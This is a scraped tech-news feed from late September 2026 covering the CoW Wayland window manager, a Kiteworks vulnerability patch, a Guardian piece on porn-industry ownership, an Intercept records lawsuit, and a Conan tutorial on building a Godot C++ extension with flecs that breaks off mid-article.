This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

What can I do to resolve this?

You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

CoW — a stacking window manager for Wayland

Lobsters
cow-wm.codeberg.page
2026-09-29 05:07:37
A stacking window manager using River as the compositor. The aims of CoW are to represent the 90s look-and-feel of FVWM and MWM, while also allowing for more modern styles as well. (...) CoW is developed in C, (...). Why is this called Cow? Because originally, cow was going to be an all-in-on...
Original Article

CoW — Compositor on Wayland

CoW

A stacking window manager using River as the compositor.

Release Information

The latest release of CoW is 0.3 (September 2026).

View the changelog

Next Release

CoW 0.4 currently includes 21 merged changes since the latest release.

  • PR : cmd: prevent stack
  • PR : module: fix snapshot issues
  • PR : cowpager: inherit font from

Preview the next release

Aims

The aims of CoW are to represent the 90s look-and-feel of FVWM and MWM, while also allowing for more modern styles as well. CoW can be configured directly through commands and the same commands can be used in its configuration file, making CoW scriptable through external applications.

High-level features include:

  • IPC scripting.
  • Server-side decorations can be customisable.
  • Placement of windows through different commands.
  • Native menu support.
  • Rules can control scripting.
  • Internal DSL (Domain Specific Language) allows for filtering.

... plus a lot more!

Community & Development

CoW is developed in C, hosted on Codeberg. The community is small but friendly, and we can be found on IRC (irc.libera.chat, in #cow-wayland)

Some useful things to know about the community:

  • IRC is the best way of saying hello or asking questions
  • Report any issues over IRC or by creating a Codeberg issue.
  • There's some chatter on Mastodon about CoW and other WMs.
  • A community Wiki exists. Feel free to contribute

Development:

Screenshot

A CoW desktop showing decorated windows, a container, pager, menus, launcher buttons and iconified windows

Kiteworks patches critical flaw, brings customer systems online

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 05:04:06
American tech company Kiteworks has lifted a precautionary advisory asking customers to shut down systems after patching a critical vulnerability. [...]...
Original Article

Kiteworks

American tech company Kiteworks has lifted a precautionary advisory asking customers to shut down systems after patching a critical vulnerability.

Formerly known as Accellion, it operates a Private Content Network (PCN) that integrates enterprise email, file sharing, Managed File Transfer (MFT), APIs, and web forms into a single platform.

Kiteworks provides services to thousands of global corporations and government agencies, and its Private Data Network has over 100 million end-users.

The secure file-sharing software company urged customers worldwide on Saturday to temporarily shut down their servers after receiving a warning of a potentially imminent cyberattack from federal intelligence authorities.

On Monday, the company brought all hosted customer systems back online after finding no evidence of compromise and no suspicious activity.

"Continuous monitoring throughout the period showed no abnormal activity, and the company has no indication that any Kiteworks or customer system was compromised," Kiteworks said .

"As of September 27th, the shutdown recommendation is now lifted for all customers. If you have not already restarted, you may bring your Kiteworks system back online," the company added in an update to the original advisory.

Kiteworks has also patched a critical vulnerability in an unnamed feature used by less than 1% of all customers and advised those with self-hosted Kiteworks Advanced Forms to contact support for further assistance.

"Kiteworks developed and deployed a fix during the window, applied an additional protective layer across all environments, and has no indication the vulnerability was ever exploited. All other Kiteworks products were unaffected," it noted.

The company has yet to share additional details on the fixed vulnerability and has not yet assigned a CVE ID for easy tracking.

Threat watchdog Shadowserver has spotted nearly 400 Kiteworks instances accessible over the Internet, most of them (234) from the United States, but provides no information on how many are honeypots or have already been patched.

Internet-exposed Kiteworks instances
Internet-exposed Kiteworks instances (Shadowserver)

​Because they store sensitive documents, cybercrime gangs often target vulnerable file-sharing platforms in data-theft extortion attacks.

For instance, the Clop extortion gang, which has a long history of exploiting vulnerabilities in enterprise file-sharing platforms, also targeted a legacy Kiteworks File Transfer Appliance (FTA) software in zero-day attacks when the company was still known as Accellion.

Accellion said at the time that 300 customers used the 20-year-old legacy FTA software, with fewer than 100 of them breached and fewer than two dozen victims appeared "to have suffered significant data theft."

That Clop hacking campaign led to a stream of data breaches impacting many high-profile entities that used the Accellion FTA software to transfer sensitive files, including cybersecurity firm Qualys , energy giant Shell , the Reserve Bank of New Zealand , supermarket giant Kroger , Singtel, the Australian Securities and Investments Commission (ASIC) , the Office of the Washington State Auditor , and multiple universities.

Five Eyes members also issued a joint security advisory in February 2021 about these attacks and subsequent extortion attempts, warning Accellion customers to block Internet access to vulnerable servers and update them to block the attacks.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

AI companies leak data to advertisers [pdf]

Hacker News
jorgegarciaherrero.com
2026-09-29 05:03:41
Comments...
Original Article
No preview for link for known binary extension (.pdf), Link: https://jorgegarciaherrero.com/wp-content/interactivos/20260916-Prompt-like-a-butterfly-sting-like-a-tracker-(clean).pdf.

MotifCentral - All Things Motif/Xt/Xlib

Lobsters
motif-central.org
2026-09-29 05:01:47
Comments...
Original Article

MotifCentral - All Things Motif/Xt/Xlib

MotifCentral:/Home

Motif Central

Motif Central brings together information about Motif, Xt, Xlib and X11 : how they fit together, how to program with them, and where to find the manuals, examples and historical material that explain them.

Begin with the X programming stack , build your first Motif application , or explore the programming resources . The history pages describe the libraries' origins, while the archive guide helps you navigate older documentation.

Learn

Understand the layers, then build your first application.

Explore the libraries, their history and working examples.

Projects

Maintained Motif software, related X11 projects and preservation efforts.

Resources

Find programming references, books and historical documentation.

About Motif Central

Ready. libXm / Xt / Xlib

‘Online sex workers literally have to bare it all’: why Patricia Nilsson is exposing the world’s biggest porn bosses

Guardian
www.theguardian.com
2026-09-29 05:01:00
As a business journalist, Nilsson began rigorously reporting on the power players of the adult industry, who prefer to remain in the shadows. Along the way, she uncovered how porn has shaped the internet – and our lives as a whole There was a time, a few decades ago, when the men who owned the world...
Original Article

T here was a time, a few decades ago, when the men who owned the world’s biggest pornography businesses were happy to be famous. They paraded a lifestyle they hoped looked glamorous, appearing in public dressed in silk pyjamas or with a woman in swimwear on each arm. Porn moguls like Hustler’s Larry Flynt or Playboy’s Hugh Hefner were household names.

“Say what you want about these old perverts, who once set the tone of our sexual culture, but at least you knew who they were and what they were selling,” Patricia Nilsson writes in her new book, Guilty Pleasure: The Pornification of the Internet , the Economy, and Everything Else. “These days, the men calling the shots are nowhere to be seen.”

It’s not that they simply feel shy about posing alongside the women who generate their income, or are wary of giving interviews. The owners of the industry’s biggest companies are so anxious to remain anonymous that we often don’t even know their names. They have understood that it is wiser to live in total obscurity.

So Nilsson’s decision to start investigating pornography for the Financial Times will no doubt have come as a very unwelcome development for these mostly invisible leaders of a sector that has been under-scrutinised for decades. For five years, she subjected the industry to the same deep analysis that a journalist would give to the oil and gas markets. She wondered why, unlike most businesses of a similar scale, pornography companies rarely made the headlines. “I started wondering: why is there so much porn everywhere? Why is the online world so saturated with images of people paid to have sex?” Nilsson says. She asks at the start of Guilty Pleasure: “We live in a world where as many people have instantaneous access to free porn as to clear water. Why aren’t we more curious about the growing role of pornography in our lives?”

Playboy’s Hugh Hefner with his onetime girlfriends, Kendra Wilkinson and Holly Madison.
Old-school … Playboy’s Hugh Hefner with his onetime girlfriends, Kendra Wilkinson and Holly Madison. Photograph: Mike Guastella/WireImage

Nilsson, 34, says she belongs to “the first generation that came of age on the internet, and to whom oceans of free porn was a normal part of life”. This perspective has shaped her calmly pragmatic approach to the subject. “Of course there are parts of the industry I’m critical of,” she says. “My argument is not that we should be neutral towards porn, but that we need to accept and understand it as a real industry, and ask what its growth and popularity says about the state of our economy and the world of work.” Nilsson is in London when we meet – she has British and Swedish citizenship but Polish roots and lives in Frankfurt, where she is approaching the end of maternity leave (she finished writing her book in the exhausting first weeks after giving birth).

Her investigations led to the discovery that the industry’s owners were now tech nerds and bankers, with no particular interest in pornography itself. “I started realising: this industry isn’t really about porn any more. I would go to these porn conferences and I couldn’t find anyone who actually worked with porn. I couldn’t find anyone who even knew someone who worked with porn, because all these people were working in [web] traffic or payment processing,” she says. I’ve attended a couple of these conferences and have been equally struck by the quantities of men in zipped tech-bro gilets who want to talk about impenetrably dry notions like affiliate marketing, barely acknowledging that they work in the world of explicit adult content.

Nilsson was determined to bring the sector’s leaders out of the shadows in part because she wanted to reveal who was getting rich through porn and how they were doing it. But she also disliked the hypocrisy of these men, some of whom had become billionaires. “Online sex workers literally have to bare it all; once you put your image out there on the internet, even if technically you control the IP, it can be very difficult to ever get it down. So it’s terrible if the people profiting from the industry then have the gall to say: ‘I want to protect my anonymity and I don’t really want to be associated with sex work,’” she says. “They don’t want to put their names out there, they don’t want to put their faces out there.”

She was the first person to track down Bernd Bergmair, the mysterious figure who, from 2013 to 2023, owned MindGeek – then the world’s largest pornography company and the conglomerate operating Pornhub. It turned out he was an Austrian former Goldman Sachs investment banker, described as an “uncle type” in expensive clothes, who had been so determined to stay hidden that others in the pornography world described him as a ghost and doubted his existence. Bergmair had written his undergraduate thesis on “financing strategies for corporate acquisitions”, and knew so little about pornography that, early on, he took his competitors out for lunch to pick their brains on how the business functioned.

A banker who had worked in Frankfurt, London, New York and Hong Kong, Bergmair “seemed entirely uninterested in the sex [work] that underpinned the empire he was buying”, Nilsson notes. “He knew it was a highly profitable business and he just cared about ensuring that the structure was safe enough so that he could keep taking his dividends out.” In 2020, Pornhub removed millions of unverified videos, some of which may have contained nonconsensual pornography, rape, child sexual abuse, violent sexual abuse of women and other abusive content .

Later, she travelled to Prague in search of the elusive owners of WebGroup Czech Republic (WGCZ), a company based in nondescript, unsignposted offices, given a deliberately unremarkable name to mask its true nature: the pornographic empire behind Penthouse, distributing content watched by hundreds of millions. Stéphane and Malorie Pacaud, the French twins in their 40s who own the company, eluded her; they occasionally appear on lists of France’s wealthiest individuals but have otherwise succeeded in staying under the radar.

“One of the reasons it’s still so hard today to regulate pornography is because you crack down on one site, and suddenly there are 15 other copycat sites coming from different jurisdictions,” Nilsson says. “You can launch a website from wherever in the world, and it can be so hard to know who’s behind them or where they are. You don’t know who’s pulling the strings.”

This matters because it means the owners of businesses that are recalibrating our sexual culture cannot be obliged to attend public hearings to explain how their business models operate, Nilsson says. Bergmair never answered regulators’ questions and now it is too late. In 2023, MindGeek was acquired by a Canadian private equity firm, Ethical Capital Partners (“you can’t make this up”, Nilsson says) and renamed Aylo. The company has a complex ownership structure, leaving uncertainty about “who controls the one-way mirror that is watching, learning from and reshaping our sexuality”.

A pedestrian walks by one of the few remaining adult DVD stores in Times Square, NYC, in 2017.
A pedestrian walks past an adult DVD store in Times Square, NYC, in 2017. Photograph: Spencer Platt/Getty Images

Nilsson began her investigations thinking she would be looking into something transgressive and remote from her own life – but she quickly realised that the logic governing how online pornography businesses worked had spilled into the mainstream. Regardless of whether or not we are consuming explicit content, the technological advances the industry pioneered now shape the experience of being online for the rest of us. She argues that the story of the online porn industry is actually the story of the internet today and “why it makes us feel so weird”.

We’re already familiar with the way pornography companies drove early improvements in the power of the internet from the 1990s onwards, to enable large quantities of video to be distributed to the maximum number of people at maximum speed. But Nilsson lists half a dozen other ways that pornography has dictated the way we navigate the internet. We can also thank pornography businesses for developing reliable, high-quality video streaming, honed by the need for glitch-free camming, where models broadcast live video feeds of themselves to customers and chat to them. And long before influencers started working out what they needed to do to grow and maintain a lucrative social media following, webcam models were deciding how best to curate online personas to keep audiences’ attention, and elicit generous tips.

Nilsson says her own virtual world is usually full of cheerful sourdough recipes or restaurants that she wants to check out on her next trip to Sicily, but she realises now that the way “all this lovely, worthwhile content” is transmitted to her phone, and the way she consumes it, is closely based on a model developed by online pornography tech developers. Companies such as MindGeek trade on desire, so they became expert early on at spotting what people browsing the internet are genuinely interested in.

“Staring at content that is algorithmically engineered to arouse you is a perfect metaphor for our relationship with our devices and the internet and social media. Pornography is no longer just about sex – its logic of capturing attention through stimulation, keeping us watching rather than doing, is embedded in the online world,” she says. Social media sites have learned from innovations developed by pornography companies – how to make the stream of content addictive, how to ensure people stay browsing for a little longer.

“We’re often scrolling, and we feel like we’re living these things, but we’re not. We’re stuck in this sort of endless loop of gratification and self-soothing, and we use our phones to calm ourselves down, or just take our mind off things, but we’re not living.” She calls this the “masturbatory” model of the internet; a model that feeds us content designed to “make us feel good, to arouse us, to flatter us, to make us linger”. She traces a clear line from the carefully flirtatious interactions of women stripping online for camming work, trying to get tips from their clients, to the docile and sycophantic tones given by developers to chatbots, “who indulge our fantasies and make us feel better than any person in our real lives can”.

In parallel, online outrage also has roots in pornography and the competition for hits, she argues. “If you look at the state of online culture today … we have so much anger and everything feels so extreme. This follows a trend you could see on Pornhub a long, long time ago – where the onslaught of free material meant that content needed to shock more and more to stand out, making pornography become more and more extreme,” she says. Anyone who followed last year’s race between the British porn stars Bonnie Blue and Lily Phillips to outdo each other by broadcasting themselves having sex with hundreds of men will know what she means.

Nilsson’s primary focus is analysing the business model, rather than charting the experiences of the women who create the content. She doesn’t soft-soap the extremes of the industry – documenting, for example, the disturbing popularity of “humiliation porn”, which is pornography that involves actors being used sexually by a group of men to the point of gagging or tears. But many of the women she interviews emphasise how the work has given them options. A different perspective is offered only occasionally.

A woman stands in front of a white pillar.
Nilsson in Frankfurt, 2026 Photograph: Stefanie Kösling/The Guardian

She tells me she felt awkward when she found herself sitting next to a depressed webcam model at an adult industry event in Prague one evening. Nilsson had been invited to attend by Katya Tiuni, a Ukrainian woman who went into camming in the 1990s to escape the poverty of the post-communist economic collapse. Tiuni later set up a school for women hoping to become online sex workers, teaching them brand development and how to cultivate long-term audience loyalty (more than 10,000 women have attended her webinars).

But the young woman next to Nilsson was not enjoying the training. “I was trying to chat about the job and she was just so unhappy, saying: ‘I don’t want to be here, I miss home, I made a mistake.’ It was such a great contrast to Katya’s lean-in feminism, feeling empowered through making money,” Nilsson says. This woman’s views on the industry do not make it into the book.

Instead, Nilsson is at pains to avoid judgment. “Historically, much feminist analysis of sex work has come from women who have never done it, or never been in circumstances where it might seem like the best option available. If we are genuinely interested in supporting sex workers, their own accounts of what the work means to them have to be central to the conversation,” she says. Thinking about what the proliferation of online pornography means for women, like her, who have to “live in a world where the idea that you can buy female attention and affection” has become mainstream, is a “completely different conversation to what it actually means to people who are doing sex work”.

More interesting, she says, is to think about why so many women are opting to go into this world. She wonders what we can learn “about the state of capitalism when so many people are saying: ‘Actually, it’s not going to work for me to get a degree and try to get a job and work my way up because just earning an income, if you don’t have previous assets, is not working any more. I need to hustle to get a down payment on my house.’”

Finally, she is curious about the links between social media and a growing readiness to post explicit content. “Why,” she asks, “do we have an online culture that has made self-exposure so normalised, and the drive to monetise one’s own image so normalised, that the step to actually selling pornography is not that big for many people?”

Is tech the secret to a more analogue life? How gadgets, apps and tips could actually reduce your screen time

Guardian
www.theguardian.com
2026-09-29 05:00:59
It’s often thought of as the problem, but what if the right technology could help us switch off and live more in the moment? • The best screen-free activities With the continued backlash against AI and growing concern about our reliance on screens, an analogue life has never looked so appealing. I h...
Original Article

W ith the continued backlash against AI and growing concern about our reliance on screens, an analogue life has never looked so appealing. I haven’t gone so far as to get myself an analogue bag just yet, but I have done a relatively complex puzzle and read five physical books this year, which is already two more than in 2025.

But it also struck me recently that I have, somewhat conversely, been using digital tools to do a lot of analogue activities. What if tech could help us live more in the present and reduce our screen time, while benefiting our physical and mental health in the long run?

With that in mind, here are six ideas for leading a more analogue life – with a little help from tech.


How to lead a more analogue life


Identifying birdsong

A willow warbler; Phylloscopus trochilus singing at Hodbarrow in Millom, Cumbria, UK.
Call of the wild: learn to recognise birds by sound. Photograph: Ashley Cooper/Getty

I’ve been a birdwatcher since I was nine, but have always struggled to identify calls and songs. While I have a huge stash of bird books, I have never been able to grasp the whimsical descriptions of how they sound, such as “zuz”, “ch-ch-si-si-si” or “tu-reep”. Last year, however, I discovered the Merlin app , which has transformed my hobby into something rather beautiful. The app, which is free and was developed by the Cornell Lab of Ornithology, lets you record what you hear and then suggests which birds are chirping nearby, using your location as a guide.

It turned out that I had been misidentifying wrens, blackcaps, willow warblers and dunnocks as robins for four decades. Now I know what they sound like, I have a better chance of spotting them, which is not always easy with the sometimes elusive blackcap. I like to spend five minutes in the morning and evening sitting still in the garden or by an open window, allowing the app to help me identify and enjoy birdsong. Merlin has also spurred me to take my dogs on more interesting forest walks because the denser the trees, the more interesting the birdsong.


Exploring new trails

A runner on a trail through a forest close to sunset.
On the right track: use tech to discover new routes. Photograph: Justin Paget/Getty

Keeping an eye on my step count has undoubtedly helped me to be more active, but those who fancy more than my brisk woodland walks may benefit from more than the built-in health app that comes with many smartphones.

“I love to use Strava heatmaps to explore new areas. It’s especially useful when I see a trail that looks fun, but don’t know where it leads or if it’s just an animal track,” says Flora Beverley , an ultramarathon runner and content creator. She adds that heatmaps build confidence because you know roughly where you’ll end up: “It means I can get myself lost on a run and know I can still find my way back. Also, once you’ve used it for a bit, it becomes easy to see the hallmark of ‘fun’ trails – twisty, windy, on a hill, great views – just by looking at the map. Wherever I travel, I always know where the good trails are and can go off-roading.”


Getting better at crafts

Young woman knitting wool using needle while watching online tutorial on laptop at home.
Stitch by stitch: video guides can help you master a new craft. Photograph: simonapilolla/Getty

Last winter I finally learned to knit, thanks to a kit from Wool and the Gang , which I used to make a natty little bonnet. I’ve been meaning to join a knitting club for years, but since this is apparently never going to happen, using the brilliant video tutorials on the brand’s website was the next best thing. Of course, I spent most of my needle time looking at my knitting, not at a screen, but whenever I got stuck, it was like having a friendly, skilled and very young grandmother on hand to help. I would have given up on the project without this visual aid, and it gave me the confidence to make another, much better version of the bonnet when I had finished the first one.

skip past newsletter promotion

Learning to drum

A shot of a young woman playing drums in her apartment. She is dressed in a plaid shirt, sits at the drums
Stick with it: picking up a new skill, one beat at a time. Photograph: Milan Markovic/Getty

I have wanted to learn to play the drums for years, and since I turn 50 next year, now seems like as good a time as ever. I am taking lessons with a real person on their acoustic drum kit, but I have gone digital alongside this both to improve more quickly and to play when my husband is in the room next door watching reruns of House without disturbing him (too much).

My secondhand electric drum kit (mine was sourced secondhand from my 83-year-old dad’s bandmate, no less) can be played through headphones and attached to my iPhone so I can drum along to songs or, even better, learn from video tutorials on YouTube. Thanks to six years of playing the violin as a child, I am able to read music, so I can get lost in it for hours at a time. Long term, the plan is to progress to my own acoustic kit (advance apologies to my neighbours – I will be considerate) and maybe even start gigging. It doesn’t get more analogue than hitting things with sticks on a stage, after all.


Getting the nudge to go outside

Functional accessories and wearable tech are getting more good looking, with jewellery-style products, such as Loop’s Swarovski earplugs and Oura ’s rings, which track sleep, steps and heart rate. I’ve never been a fan of smartwatches – is there anything more annoying than the person next to you in a yoga class checking their messages when they should be relaxing into their breath work? – but I do like the subtlety of a ring, particularly since my step count is often out of kilter with my phone because I don’t carry it everywhere with me.

For more, read technology expert Samuel Gibbs’s pick of the best running watches


Understanding plant life

Creeping buttercup and other flowers being removed from a lawn with a blue trowel.
Know your weeds: plant ID apps can help you decide what stays and what goes. Photograph: fermate/Getty

Keeping your garden wild is all well and good, but you could end up with some pretty nasty plants popping up – a particular risk for children or pets. I’m far more likely to take my phone outdoors than a hardback book, so thanks to the PictureThis app, I can more easily distinguish my hemlock water dropwort (deadly) from my wild carrot (not deadly), and even my creeping buttercup (a thug) from my field buttercup (a real beauty). In turn, I am able to spend time doing selective weeding, taking out the plants I really don’t want and keeping those that will benefit the ecosystem (and aesthetics) of my garden, such as the native pussy willow that took up residence this year next to the barbecue.

For more, read our roundup of the best screen-free, calming activities


Hannah Rochell is a journalist who specialises in writing about – and experiencing – a slower, more sustainable lifestyle, which she documents on her Substack Slowette . This involves everything from switching to eco-friendly cleaning products and advocating for dehumidifiers instead of tumble dryers, to shopping exclusively at responsible fashion brands and learning to sew

The Intercept Sues Texas City Over Refusal to Release Police Records on Prairieland Protest

Intercept
theintercept.com
2026-09-29 04:53:00
“This is one of the singularly most distressing cases that I’ve seen in terms of public access to records. This is stonewalling on steroids.” The post The Intercept Sues Texas City Over Refusal to Release Police Records on Prairieland Protest appeared first on The Intercept....
Original Article

The Intercept is suing a city government in Texas in a bid to release police records related to the violent confrontation at an immigration detention facility that led to the landmark Prairieland trial earlier this year.

In a filing in state court, The Intercept accused the city of Alvarado, Texas, and its police department of refusing to release records sought under the state’s Public Information Act. The news outlet asked a judge to order the city to release records of police communications on the days before and after a noise demonstration outside U.S. Immigration and Customs Enforcement’s Prairieland detention facility that turned violent.

Despite The Intercept agreeing to pay hundreds of dollars for the records, the city has failed to process the payment and left the records request in limbo, according to the complaint and to attorney Terry Mutchler, a veteran defender of records access who is representing The Intercept in the case.

“I’ve been doing this for 30 years, and this is one of the singularly most distressing cases that I’ve seen in terms of public access to records,” Mutchler said. “This is stonewalling on steroids.”

“This is a situation where the public officials should be ashamed of themselves for forgetting who they work for.”

“The Intercept cut the check, and now the city won’t cash the check and they won’t give us the records — it’s radio silence,” said Mutchler. “This is a situation where the public officials should be ashamed of themselves for forgetting who they work for.”

A representative of the Alvarado city government did not immediately respond to a request for comment.

The complaint stems from a request filed under the state’s Public Information Act by freelance journalist C. Frances , who, on behalf of The Intercept, sought records of communications by Alvarado Police Department personnel in connection to a noise demonstration on July 4, 2025, at the Prairieland facility. The protest devolved into an armed confrontation and shots were fired . An Alvarado police officer suffered non-life-threatening injuries in the shooting.

More than a dozen protesters, including people present that evening and others with varying levels of involvement in the protest, were arrested in the aftermath of the incident.

That case against the protesters became a proving ground of the Trump administration’s war on the activist left, ending with hefty sentences for many of the co-defendants, including Benjamin Song, who was sentenced to 100 years in prison for attempted murder and other charges. Song and other defendants are set to appeal their convictions.

The records saga began on February 16, when Frances submitted a request to Alvarado city government for internal and external communications to and from its police department between July 4 and July 18, 2025. Over the next month, amid a back and forth with city officials over the scope of the request, Frances eventually narrowed her request to all email communications directly related to the incident. Weeks later, the city told Frances the bill for the records, including labor hours spent processing and redacting them, would come to $854.17.

Months later, after a back and forth referred to by The Intercept’s counsel as a “tortured procedural history,” The Intercept decided to pony up for the records and issued a payment for the full amount requested in April.

“Despite receiving payment,” The Intercept wrote in its filing Friday, “neither the City nor the Police Department have produced any of the responsive emails, have not certified that no responsive information exists, have not obtained or communicated any attorney general decision authorizing continued withholding of the requested information, and have not otherwise responded substantively to the Request.”

Evan Doorbell's Phone Tapes – Brought to You by Telephone World

Hacker News
evan-doorbell.com
2026-09-29 04:40:53
Comments...
Original Article

Old photo of operators.

Evan Doorbell’s Phone Tapes are a well known “documentary” of how the phone system used to be like in the 1970s. Evan has recorded many hours of “phone tapes” of the old phone network.

Evan has graciously allowed Telephone World to host his narrated tapes as well as some of his newly released unnarrated “raw tapes”.

This material is copyrighted by Evan Doorbell. Free to redistribute but please do not sell!

Group 1 Playlist (Start Here)

New to the site? Start with the Group 1 Playlist with 95 of the top narrated phone trips from Evan Doorbell.

Production Tapes

Production tapes are phone trip tapes that Evan Doorbell has narrated with full descriptions.

Raw Tapes

These are tapes that Evan Doorbell has not narrated but is sharing for those who wish to listen to tapes of telephone sounds.

Using any C++ library in Godot

Hacker News
blog.conan.io
2026-09-29 04:40:37
Comments...
Original Article

Godot has become one of the most popular game engines of the last few years. It is free, open source under the MIT license, and small enough to download and start using in minutes. Most Godot games are written in GDScript, the engine’s own scripting language.

Sooner or later, though, many projects need something that already exists as a C or C++ library: a simulation library, a database, a networking protocol, a machine learning runtime. GDScript cannot call native code, but Godot can load it through GDExtension , and godot-cpp , the official C++ bindings, lets you expose that code as regular engine classes. Writing the C++ code is the easy part. The hard part is the build: godot-cpp has to match your Godot version, and every library you add has to be compiled for each platform you ship to.

In this post we give a short tour of Godot, explain how C++ extensions work, and show how to bring C++ libraries into a Godot game with Conan and godot-cpp 10, now available in ConanCenter. As an example we will use flecs , an Entity Component System library, to simulate 100,000 particles inside a Godot scene.

100,000 particles simulated with flecs inside a Godot scene, fleeing from the mouse cursor

A Quick Introduction to Godot

Godot is a general purpose engine for 2D and 3D games. Everything in a Godot project is built from two concepts:

  • Nodes are the basic building blocks. Each node has a type ( Sprite2D , Camera3D , AudioStreamPlayer , Timer …), a set of properties you can edit in the Inspector, and callbacks such as _ready() or _process() that the engine calls during the game loop.
  • Scenes are trees of nodes saved to disk as .tscn files. A scene can be a character, a menu or a whole level, and scenes can be instanced inside other scenes.

Behavior is usually added by attaching a script to a node. GDScript is a Python-like language designed for the engine, and it is great for gameplay logic because changes show up immediately without a compile step.

What makes Godot interesting for C++ developers is that the engine itself is written in C++, and it can load extensions written in C++ without being recompiled. A class that comes from one of these extensions becomes a regular engine class: it shows up in the editor next to the built-in nodes, with its properties in the Inspector, and GDScript can use it like any other node. The next section explains how these extensions work.

Extending Godot with C++

There are two ways to add C++ code to Godot:

  • Engine modules are compiled into the engine itself. They have full access to the internals, but you need to build and ship your own copy of Godot, including the editor and export templates for every platform.
  • GDExtension loads a shared library ( .dll , .so , .dylib , or .wasm on the web) into an official, unmodified Godot build at runtime. The engine talks to the library through a stable C interface.

GDExtension is the recommended approach for most projects, and it is how many popular plugins are distributed today. Because the C interface is verbose to use directly, the Godot team maintains godot-cpp , a C++ library that wraps it with an API very close to the one used inside the engine. It provides a C++ class for every engine class, such as Node2D , Sprite2D or Input .

Your own classes are regular C++ code that derives from those classes. A node written with godot-cpp looks like this:

#include <godot_cpp/classes/node2d.hpp>

namespace godot {

class MyNode : public Node2D {
    GDCLASS(MyNode, Node2D)

protected:
    static void _bind_methods() {}

public:
    void _process(double p_delta) override {
        // runs every frame
    }
};

} // namespace godot

Since version 10.0, a single godot-cpp release works with any Godot version from 4.3 onwards. You pick one with the api_version build option, and godot-cpp generates its C++ classes from the API of that version. An extension built for Godot 4.3 also works in newer versions, but not in older ones, so you usually pick the oldest Godot version you want to support.

Build targets and feature tags

There is one more concept you need to know before building anything. godot-cpp is compiled for one of three targets , named after the Godot builds that load the library:

  • template_debug : the default. Enables debug checks through the DEBUG_ENABLED definition. This library is loaded by the editor and by debug exports.
  • template_release : for release exports, with the debug checks removed.
  • editor : for libraries that are only loaded by the editor.

Which library Godot loads is decided at runtime by a small .gdextension file. It maps feature tags to library paths. The debug tag matches the editor and debug exports, and the release tag matches release exports:

[configuration]
entry_symbol = "gdexample_library_init"
compatibility_minimum = "4.7"

[libraries]
macos.debug = "res://bin/libgdexample.template_debug.dylib"
macos.release = "res://bin/libgdexample.template_release.dylib"
linux.debug = "res://bin/libgdexample.template_debug.so"
linux.release = "res://bin/libgdexample.template_release.so"
windows.debug = "res://bin/libgdexample.template_debug.dll"
windows.release = "res://bin/libgdexample.template_release.dll"

The usual workflow

The Godot documentation recommends adding godot-cpp to your repository as a git submodule and building it together with your library using SCons. That works well for a first extension, but every project ends up compiling its own godot-cpp for each target, platform and architecture, and any third party library you wrap, such as a physics engine or a machine learning runtime, has to be vendored and built with matching flags for every platform Godot exports to.

Both are exactly the kind of problem Conan was built to solve.

Managing the Dependencies with Conan

With the godot-cpp recipe in ConanCenter, godot-cpp becomes a regular package. The two parameters discussed above are Conan options:

  • api_version : the Godot API version the bindings target, from 4.3 to 4.7 (the default).
  • target : template_debug (the default), template_release or editor .

Each combination is built once and then reused by every project that needs it, instead of being compiled inside each extension.

Your GDExtension becomes just another C++ project with dependencies. Any of the more than 1,900 libraries in ConanCenter , or one you package yourself with a Conan recipe , can be added next to godot-cpp, and Conan builds all of them consistently for every platform you target.

A Practical Example: A Swarm of 100,000 Particles

To show how this works in practice, we will write a GDExtension that registers a new Swarm node. It simulates 100,000 particles that flee from the mouse cursor and bounce off the window edges, and draws all of them in a Godot scene.

The simulation runs on flecs , an Entity Component System (ECS) library for C and C++. In an ECS, entities are plain ids, components are plain data structs attached to them, and systems are functions that run over every entity that has a given set of components. Components of the same type are stored together in memory, which makes iterating over large numbers of entities very fast. That is why ECS is a popular choice for simulations, crowds or bullet hell games. It is also the kind of work where native code pays off, since updating this many entities every frame is much faster in C++ than in GDScript.

You can find the complete example in the Conan examples2 repository :

$ git clone https://github.com/conan-io/examples2.git
$ cd examples2/examples/libraries/godot-cpp/gdextension

The src folder contains the extension code, and demo is a regular Godot project that loads it.

Declaring the dependencies

The conanfile.py requires godot-cpp and flecs from ConanCenter:

from conan import ConanFile
from conan.tools.cmake import CMake, CMakeToolchain, cmake_layout


class GDExtensionExample(ConanFile):
    package_type = "shared-library"
    settings = "os", "compiler", "build_type", "arch"
    generators = "CMakeDeps"

    def requirements(self):
        self.requires("godot-cpp/10.0.0")
        self.requires("flecs/4.1.6")

    def layout(self):
        cmake_layout(self)

    def generate(self):
        tc = CMakeToolchain(self)
        # Godot picks the library to load by its build "target", so we name
        # the output after the target godot-cpp was built with
        tc.cache_variables["GODOTCPP_TARGET"] = str(self.dependencies["godot-cpp"].options.target)
        tc.generate()

    def build(self):
        cmake = CMake(self)
        cmake.configure()
        cmake.build()

The only Godot specific detail is in generate() . We read the target option of the godot-cpp dependency and pass it to CMake, so the name of the library always matches the godot-cpp binary it was linked against.

The CMakeLists.txt

cmake_minimum_required(VERSION 3.15)
project(gdexample LANGUAGES CXX)

find_package(godot-cpp REQUIRED CONFIG)
find_package(flecs REQUIRED CONFIG)

add_library(gdexample SHARED
    src/register_types.cpp
    src/swarm.cpp
)
target_link_libraries(gdexample PRIVATE godot-cpp flecs::flecs_static)

# Output as demo/bin/libgdexample.<target>.<ext>, the path the
# demo/bin/gdexample.gdextension file points Godot to. The generator
# expression prevents multi-config generators from adding a Release/ subfolder
set_target_properties(gdexample PROPERTIES
    OUTPUT_NAME "gdexample.${GODOTCPP_TARGET}"
    PREFIX "lib"
    LIBRARY_OUTPUT_DIRECTORY "$<1:${CMAKE_SOURCE_DIR}/demo/bin>"
    RUNTIME_OUTPUT_DIRECTORY "$<1:${CMAKE_SOURCE_DIR}/demo/bin>"
)

This is a completely standard CMake project. The extension is a shared library that links godot-cpp and flecs statically, so there is a single library file to ship. We write it straight into demo/bin so Godot finds it without an extra copy step.

Writing the node

